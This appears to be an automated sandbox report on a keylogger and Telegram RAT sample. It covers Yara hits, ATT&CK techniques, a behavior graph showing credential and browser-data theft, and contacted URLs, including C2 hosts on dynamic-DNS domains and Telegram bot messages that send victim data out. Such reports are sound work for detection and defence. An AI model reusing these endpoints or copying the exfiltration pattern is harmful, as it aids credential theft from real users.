                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4175454469.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F56283
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F56747
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00606283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00606283
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00606747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00606747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		2
                Valid Accounts                		3
                Native API                		111
                Scripting                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		3
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS137
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		1
                Masquerading                		LSA Secrets231
                Security Software Discovery                		SSH3
                Clipboard Data                		14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		Cached Domain Credentials11
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Virtualization/Sandbox Evasion                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588301 Sample: 3i1gMM8K4z.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 11 other signatures 2->52 8 3i1gMM8K4z.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\ghauts.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 14 ghauts.exe 2 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 ghauts.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\ghauts.vbs, data 14->28 dropped 62 Multi AV Scanner detection for dropped file 14->62 64 Binary is likely a compiled AutoIt script file 14->64 66 Machine Learning detection for dropped file 14->66 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49754, 49772 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 158.101.44.242, 49731, 49734, 49736 ORACLE-BMC-31898US United States 20->38 40 reallyfreegeoip.org 104.21.16.1, 443, 49732, 49733 CLOUDFLARENETUS United States 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                3i1gMM8K4z.exe66%ReversingLabsWin32.Trojan.AutoitInject
                3i1gMM8K4z.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Okeghem\ghauts.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Okeghem\ghauts.exe66%ReversingLabsWin32.Trojan.AutoitInject

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.16.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		158.101.44.242
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000008.00000002.4172080373.0000000003282000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003273000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.office.com/DzhRegSvcs.exe, 00000002.00000002.4172452396.00000000032C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://chrome.google.com/webstore?hl=enDzhRegSvcs.exe, 00000002.00000002.4172452396.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegSvcs.exe, 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000428E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000040DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004240000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000424E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004356000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004275000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000409C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004200000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004497000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://chrome.google.com/webstore?hl=enDzeRegSvcs.exe, 00000008.00000002.4172080373.0000000003251000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegSvcs.exe, 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004396000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000428E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.00000000040DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004240000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000424E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004356000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004275000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000409C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004200000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004497000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000008.00000002.4172080373.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://varders.kozow.com:8081RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.office.com/DzeRegSvcs.exe, 00000008.00000002.4172080373.0000000003282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.office.com/lBdqRegSvcs.exe, 00000002.00000002.4172452396.00000000032BD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000327D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://aborters.duckdns.org:8081RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://chrome.google.com/webstore?hl=enlBdqRegSvcs.exe, 00000002.00000002.4172452396.000000000328C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000324C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://anotherarmy.dns.army:8081RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRegSvcs.exe, 00000002.00000002.4175379546.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000421B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004371000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004246000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000448F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000041DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004207000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004332000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000444F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://checkip.dyndns.org/qRegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.000000000312E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4172452396.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.000000000315A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003134000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRegSvcs.exe, 00000002.00000002.4175379546.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000421B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004371000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004246000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.000000000448F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000041DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004207000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004332000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.000000000444F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
